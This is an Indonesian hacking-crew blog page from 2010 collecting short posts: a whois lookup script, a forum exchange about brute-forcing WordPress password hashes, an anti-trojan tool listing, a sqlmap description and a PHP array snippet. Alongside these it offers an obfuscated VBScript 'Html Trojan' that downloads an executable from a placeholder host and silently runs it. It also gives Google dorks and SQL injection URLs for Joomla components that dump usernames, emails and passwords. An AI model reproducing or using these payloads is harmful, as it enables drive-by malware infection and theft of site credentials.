blis<=========|Gue_ni|=========>blis
| <====(( JATIMCREW )) Waktu Dimana Anak-anak Bangsa Menunjukkan Kreativitasnya-----------|
Darah_2Darah_1

Selasa, 31 Agustus 2010

Shell Script Untuk Mendapatkan Informasi data center, IP pemilik, Kota dan Negara Dari Nama Domain

#!/bin/bash
# A sample shell script to print domain ip address hosting information such as
# Location of server, city, ip address owner, country and network range.
# This is useful to track spammers or research purpose.
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Last updated on Mar/05/2010
# -------------------------------------------------------------------------

# Get all domains
_dom=$@

# Die if no domains are given
[ $# -eq 0 ] && { echo "Usage: $0 domain1.com domain2.com ..."; exit 1; }
for d in $_dom
do
_ip=$(host $d | grep 'has add' | head -1 | awk '{ print $4}')
[ "$_ip" == "" ] && { echo "Error: $d is not valid domain or dns error."; continue; }
echo "Getting information for domain: $d [ $_ip ]..."
whois "$_ip" | egrep -w 'OrgName:|City:|Country:|OriginAS:|NetRange:'
echo ""

done

Jalankan script berikut ini :
./script.sh cyberciti.biz google.com
Contoh yang keluar:

Getting information for domain: cyberciti.biz [ 74.86.48.99 ]...
OrgName: SoftLayer Technologies Inc.
City: Dallas
Country: US
NetRange: 74.86.0.0 - 74.86.255.255
OriginAS: AS36351

Getting information for domain: google.com [ 209.85.231.104 ]...
OrgName: Google Inc.
City: Mountain View
Country: US
NetRange: 209.85.128.0 - 209.85.255.255

Sumber
ReadMore

Selasa, 10 Agustus 2010

Bingung, apa ni ya Maksudnya??

Aku kan sekarang gi sekolah d luar negeri (LEBAY,... ^_^ ^_^), truss aku tanya d tempat diskusi kayak gni :

password generated with Wordpress
technology?
how to decrypt?
for example:
admin:$P$9UNhia0YtfZBjpIxbzHZMsuL.SXrU9.


habis tu ada yang jawab kayak gni :

Need the salt and it its word press look at the source for the hashing to get an idea of what other information you need...but really u need the salt to crack them, unless they changed out they generate the hash of a password. Otherwise you can crack the salt as well and make it a bitch lol.

Someone correct me or confirm this please.

<?php
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;

function PasswordHash($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;

$this->portable_hashes = $portable_hashes;

$this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compability reasons
}

function get_random_bytes($count)
{
$output = '';
if ( @is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}

if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}

return $output;
}

function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);

return $output;
}

function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);

return $output;
}

function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';

if (substr($setting, 0, 3) != '$P$')
return $output;

$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;

$count = 1 << $count_log2;

$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;

if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}

$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);

return $output;
}

function gensalt_extended($input)
{
$count_log2 = min($this->iteration_count_log2 + 8, 24);
# This should be odd to not reveal weak DES keys, and the
# maximum valid value is (2**24 - 1) which is odd anyway.
$count = (1 << $count_log2) - 1;

$output = '_';
$output .= $this->itoa64[$count & 0x3f];
$output .= $this->itoa64[($count >> 6) & 0x3f];
$output .= $this->itoa64[($count >> 12) & 0x3f];
$output .= $this->itoa64[($count >> 18) & 0x3f];

$output .= $this->encode64($input, 3);

return $output;
}

function gensalt_blowfish($input)
{
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);

return $output;
}

function HashPassword($password)
{
$random = '';

if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}

if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) {
if (strlen($random) < 3)
$random = $this->get_random_bytes(3);
$hash =
crypt($password, $this->gensalt_extended($random));
if (strlen($hash) == 20)
return $hash;
}

if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;

return '*';
}

function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);

return $hash == $stored_hash;
}
}

?>


^code used to generate the hash, may not be the same as your version but ya...


<?php
$wp_hasher = new PasswordHash(8, TRUE);

$password_hashed = '$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/';
$plain_password = 'test';

if($wp_hasher->CheckPassword($plain_password, $password_hashed)) {
echo "YES, Matched";
}
else {
echo "No, Wrong Password";
}
?>


^code from wordpress that can be modified to brute a password, just a fyi lol

That should be everything you need :D


habis itu aku bingung banget apa tu maksud dari jawaban orang tu ya,,....
soalnya bahasa inggris minim banget, jdi ya agak bingung,,,,...
ReadMore

Anti Trojan Elite

Anti Trojan Elite adalah malware remover yang akan mendeteksi dan membersihkan malware pada disk atau memori.
Anti Trojan Elite dapat mendeteksi lebih dari 35.000 trojan, worm dan keyloggers.

Anti Trojan Elite memiliki beberapa Utility:

  1. The network utility [AD] : Dapat digunakan untuk memutuskan koneksi TCP yang mencurigakan.
  2. The process utility : Dapat digunakan untuk membunuh proses yang mencurigakan bahkan proses memiliki sistem priviage, bahkan memiliki kemampuan untuk membongkar modul mencurigakan dalam semua proses.
  3. The registry repair utility : Dapat digunakan untuk memperbaiki registri diubah oleh malware.
  4. The registry monitor utility : Dapat digunakan untuk memperbaiki perubahan dari kunci registri penting dan nilai-nilai dengan real time.

Download :
Anti Trojan Elite

Download :
Trojan Remover
ReadMore

Html Trojan

<script language="VBScript" type="text/javascript">
on error resume next
dl = "www.site.com/trojan.exe"
Set df = ********.createElement("o bject")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cl s4
df.setAttribute "classid",clsfull

strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&st rr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5 &ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&sc ripp3&scripp4&scripp5
set FF = df.createobject(scripp,"" )
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1 )
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Ap plication","")
MM.ShellExecute fnamezz1,"","","open",0
</ s c r i p t >
</BODY>
</HTML></body></html></script>
ReadMore

Sqlmap 0.5 - Automated SQL Injection Tool

==[Features]==

* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end.

* Can also identify Microsoft Access, DB2, Informix and Sybase;

* Extensive database management system back-end fingerprint based upon:
- Inband DBMS error messages
- DBMS banner parsing
- DBMS functions output comparison
- DBMS specific features such as MySQL comment injection
- Passive SQL injection fuzzing

* It fully supports two SQL injection techniques:
- Blind SQL injection, also known as Inference SQL injection
- Inband SQL injection, also known as UNION query SQL injection

Download : sqlmap 0.5
ReadMore

Joomla Component (com_youtube) SQL Injection Vulnerability

==[Google Dork]==

inurl:"com_youtube"

##################################################

===[ Exploit ]===

http://www.site.com/index.php?option=com_youtube&id_cate=4

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

or

http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

##################################################
ReadMore

Senin, 09 Agustus 2010

Joomla Component SQL Injection Vulnerability

[Google Dork]:

inurl:com_content

Exploit :

http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

http://localhost/index.php?option=com_content&task=blogcategory&id=60 Itemid=99999+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users/*
ReadMore

Minggu, 01 Agustus 2010

Remove Element from array

Bagi yang udah ngerti atau udah merasa master skip ja bacaan yang tidak berguna ini, soalnya ini hanya hasil Copas ja....

Kode ini menghapus elemen dari sebuah array, kita bisa memasukkan salah satu kunci atau nilai dari elemen yang ingin kita hapus :


<?
$arr[]="abdy";
$arr[]='andy';
$arr[]='elis';
$arr[]='budiono';
$arr[]='Isa';

unset_arr($arr,"key","9");
function unset_arr($arr, $searchField="value",$value)
{
echo "Array 1:= ";print_r($arr);
if($searchField=="key")
{
if(array_key_exists($value,$arr))
{
echo "Key= $key is unset....!";
}
else
echo "Key=$value is not exist in array<br />";
}
else
{
$found=array_search($value,$arr);
if($found!="") unset($arr[$found]);
else
echo "Given value is not exist in array.....!<br />";
}
echo "<br />";
$arr=array_values($arr);
echo "Array Result==";
print_r($arr);
return $arr;
}
?>

Moga bermanfaat,,, :) :)
ReadMore